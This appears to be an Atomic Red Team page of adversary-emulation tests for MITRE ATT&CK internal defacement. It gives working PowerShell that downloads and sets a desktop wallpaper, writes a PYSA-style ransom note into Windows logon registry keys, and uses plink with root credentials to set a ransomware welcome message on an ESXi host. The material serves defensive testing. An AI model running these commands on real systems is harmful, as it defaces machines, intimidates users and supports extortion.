An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)
Downloads an image from a URL and sets it as the desktop wallpaper.
Supported Platforms: Windows
auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3
| Name | Description | Type | Default Value |
|---|---|---|---|
| url_of_wallpaper | URL pointing to the image file you wish to set as wallpaper | url | https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png |
| pointer_to_orginal_wallpaper | Full path to where a file containing the original wallpaper location will be saved | string | $env:TEMP\T1491.001-OrginalWallpaperLocation |
| wallpaper_location | Full path to where the downloaded wallpaper image will be saved | string | $env:TEMP\T1491.001-newWallpaper.png |
$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
$wc = New-Object System.Net.WebClient
try{
$wc.DownloadFile($url, $imgLocation)
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($imgLocation)
}
catch [System.Net.WebException]{
Write-Host("Cannot download $url")
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($imgLocation)
}
finally{
$wc.Dispose()
}$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) {
$orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}"
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($orgImg)
}
Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore
Remove-Item "#{wallpaper_location}" -ErrorAction IgnoreAtomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.
SynAck Ransomware, Grief Ransomware, Maze Ransomware, Pysa Ransomware, Spook Ransomware, DopplePaymer Ransomware, Reedemer Ransomware, Kangaroo Ransomware
Supported Platforms: Windows
auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b
| Name | Description | Type | Default Value |
|---|---|---|---|
| legal_notice_caption | Title of ransom message | string | PYSA |
| legal_notice_text | Body of ransom message | string | Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org |
$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -ForceSet-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $orgLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -ForceChanges the ESXi welcome message to potentially display ransom information. Reference
Supported Platforms: Windows
auto_generated_guid: 30905f21-34f3-4504-8b4c-f7a5e314b810
| Name | Description | Type | Default Value |
|---|---|---|---|
| vm_host | Specify the host name or IP of the ESXi server. | string | atomic.local |
| vm_user | Specify the privilege user account on the ESXi server. | string | root |
| vm_pass | Specify the privileged user's password. | string | password |
| plink_file | Path to Plink | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe |
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system welcomemsg set -m 'RANSOMWARE-NOTIFICATION'"if (Test-Path "#{plink_file}") {exit 0} else {exit 1}New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"